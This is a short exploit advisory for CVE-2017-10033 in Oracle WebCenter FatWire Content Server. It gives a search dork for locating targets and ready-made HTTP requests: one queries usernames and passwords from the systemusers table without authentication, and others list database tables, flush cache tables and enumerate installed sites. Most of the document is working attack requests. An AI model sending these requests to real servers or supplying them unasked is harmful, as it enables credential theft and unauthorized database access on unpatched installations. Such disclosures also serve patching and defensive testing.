# Exploit Title: Oracle WebCenter FatWire Content Server < 7 - Improper Access Control# Dork: inurl:Satellite?pagename# Date: 2017-10-17# Exploit Author: Sebastian Cornejo Olave# Vendor Homepage: http://oracle.com# Version: 5.5.2 ,7.5 <=# CVE: CVE-2017-10033# Category: Webapps# Tested on: Kali linux# VULNERABILITY DESCRIPTION# It has been discovered that there is an incorrect access control over# several resources in previous versions of Fatwire (confirmed# FutureTenseContentServer 5.5.2 ,7.5) that allow the sending of SQL# queries and query the tables and database schema without authentication.# PoC : Improper Access Control
PAYLOAD : SQL query
POST /cs/Satellite HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101
Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98tbl=AArticles&query=select+username%2Cpassword+from+systemusers&pagename=Support%2FVerify%2Fexport
PAYLOAD : show all table database
https://www.example.com/cs/Satellite?pagename=Support/Verify/tablelistHTML
https://www.example.com/cs/Satellite?pagename=Support/CacheManager/FlushTables&cmd=null
OR request
POST /cs/Satellite HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101
Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98pagename=Support/Verify/tablelistHTML
PAYLOAD : URL list ID installed Site
https://www.example.com/cs/Satellite?pagename=OpenMarket/Demos/index
# Collaborators# Vis0r# Queseguridad
